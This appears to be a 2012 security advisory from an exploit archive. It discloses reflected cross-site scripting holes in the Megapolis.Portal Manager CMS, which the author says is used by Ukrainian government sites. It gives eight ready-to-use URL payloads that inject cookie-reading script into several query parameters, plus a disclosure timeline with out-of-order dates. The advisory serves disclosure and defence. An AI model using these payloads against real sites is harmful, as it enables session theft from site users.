Home / exploitsPDF  

Megapolis.Portal Manager Cross Site Scripting

Posted on 09 October 2012

Hello list!

I want to warn you about multiple Cross-Site Scripting vulnerabilities in
Megapolis.Portal Manager.

It's commercial CMS from Softline-IT (earlier Softline), which in
particularly widespread among Ukrainian government sites (including
ministry, parliament, two special services and many other web sites). In
previous years I already wrote about multiple vulnerabilities in
Megapolis.Portal Manager. These particular vulnerabilities were found at web
sites of ministry and parliament.

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of Megapolis.Portal Manager.

Developer of Megapolis.Portal Manager declined to fix these vulnerabilities.

----------
Details:
----------

XSS (WASC-08):

http://site/control/news?date=04.07.2012'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/control/news?cat_id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/control/uk/publish/category/news_left?cat_id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/control/uk/publish/category/news_left/news_left?cat_id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/control/uk/publish/category/news_left?from=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/control/uk/publish/category/news_left/news_left?from=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/control/uk/publish/category/news_left?to=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/control/uk/publish/category/news_left/news_left?to=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

------------
Timeline:
------------

2012.07 - found multiple vulnerabilities at multiple government sites,
including web sites of ministry and parliament. In addition to all those
holes during 2006-2012.
2012.07 - informed admins of these sites.
2012.07.13 - announced at my site about holes in Megapolis.Portal Manager.
2010.07.16 - informed developers.
2010.07.16 - developers answered, that they don't care about these holes
(and so about all web sites on their CMS) and will not fix them.
2010.07.19 - I've disagreed with developers' position and suggest to not
decline the support of the government sites for which they were paid.
2012.10.06 - disclosed at my site (http://websecurity.com.ua/5949/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

 

TOP

Malware :

Exploits :